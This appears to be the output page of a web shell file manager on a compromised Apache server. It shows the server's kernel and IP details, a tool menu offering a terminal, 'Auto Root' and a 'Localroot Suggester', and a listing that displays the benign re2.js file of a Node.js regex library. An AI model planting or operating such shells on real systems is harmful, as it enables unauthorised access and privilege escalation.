Linux v69820.1blu.de 4.15.0 #1 SMP Mon Sep 30 15:36:27 MSK 2024 x86_64
Apache/2.4.58
Server IP : 195.90.215.149 & Your IP : 216.73.216.250
Domains :
Cant Read [ /etc/named.conf ]
User : www-data
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
usr /
lib /
x86_64-linux-gnu /
nodejs /
re2 /
Delete
Unzip
Name
Size
Permission
Date
Action
build
[ DIR ]
drwxr-xr-x
2024-07-10 10:56
scripts
[ DIR ]
drwxr-xr-x
2024-07-10 10:56
package.json
1.42
KB
-rw-r--r--
2024-03-21 03:52
re2.d.ts
1.39
KB
-rw-r--r--
2024-03-21 03:52
re2.js
1.01
KB
-rw-r--r--
2024-03-21 03:52
Save
Rename
'use strict'; const RE2 = require('./build/Release/re2.node'); if (typeof Symbol != 'undefined') { Symbol.match && (RE2.prototype[Symbol.match] = function (str) { return this.match(str); }); Symbol.search && (RE2.prototype[Symbol.search] = function (str) { return this.search(str); }); Symbol.replace && (RE2.prototype[Symbol.replace] = function (str, repl) { return this.replace(str, repl); }); Symbol.split && (RE2.prototype[Symbol.split] = function (str, limit) { return this.split(str, limit); }); Symbol.matchAll && (RE2.prototype[Symbol.matchAll] = function* (str) { if (!this.global) { throw TypeError('String.prototype.matchAll called with a non-global RE2 argument'); } const re = new RE2(this); re.lastIndex = this.lastIndex; for (;;) { const result = re.exec(str); if (!result) break; if (result[0] === '') ++re.lastIndex; yield result; } }); } module.exports = RE2;